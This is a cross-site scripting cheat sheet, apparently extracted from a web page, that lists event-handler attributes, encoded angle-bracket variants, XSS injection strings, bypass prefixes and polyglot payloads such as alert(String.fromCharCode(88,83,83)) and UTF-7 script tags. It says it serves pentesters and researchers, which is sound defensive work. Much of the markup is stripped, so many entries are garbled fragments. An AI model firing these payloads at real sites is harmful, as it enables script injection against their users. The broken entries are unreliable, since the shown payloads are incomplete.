Title: Ultimate Cross Site Scripting Attack Cheat Sheet
Last Update: 2021-08-17
Note: This is a technical sheet for research into cross-site scripting and script code injection attacks. Please extend the list or contribute updates. The cheat sheet is intended to assist pentesters, developers, researchers & whitehats. Much of the markup in the entries below appears to have been stripped or entity-decoded when the page was extracted, so several entries are incomplete. The Brackets list shows encoded forms of angle brackets (URL-encoded, Base64, hex and Unicode escapes) that a filter has to decode and normalise before matching.
Tags: onclick ondblclick onmousedown onmousemove onmouseover onmouseout onmouseup onkeydown onkeypress onkeyup onabort onerror onload onresize onscroll onunload onsubmit onblur onchange onfocus onreset onselect onMoveOn
Features: script-unsafe-inline style-inline-allowed style-inline-blocked unsafe-eval external-scripts external-iframes controls-index-of-iframe controls-name controls-URL not-innerHTML chrome-only safari-only firefox-innerHTML chrome-innerHTML
Brackets >" "> <" >< >"< .\>"%20<./ />%20< %20/%20> %20">%20< %3E%3C Pjw= / %0A %0C %0D < %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
XSS Strings:
exp/* ]] document.cookie=true'); ?> +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
& &{document.cookie=true;}; @mario_payload
< ;
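]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
Restriction Bypass (the XSS Strings above, each prefixed with `>"`, which checks whether output reflected into markup is encoded for its context; entries showing only the prefix appear to have lost their markup in extraction): >" >" >" >"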
>"
>"
>"
>" >" >" >"exp/* >" >" >" >" >" >" >"]] >" >" >"document.cookie=true'); ?> >" +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- >" >"
>" >" >" >" >"& >"&{document.cookie=true;}; >" >" >" >" >" >" >"
>"
>"
>"
>" >" >" >"< >" >" >" >" >" >"; >"
]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> "> "autofocus onfocus=alert(1)// '-alert(1)-' \'-alert(1)// javascript:alert(1) Others: Random ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> '';!--"=&{()} "> perl -e 'print "";' > out perl -e 'print "alert(\"XSS\")";' > out < \";alert('XSS');//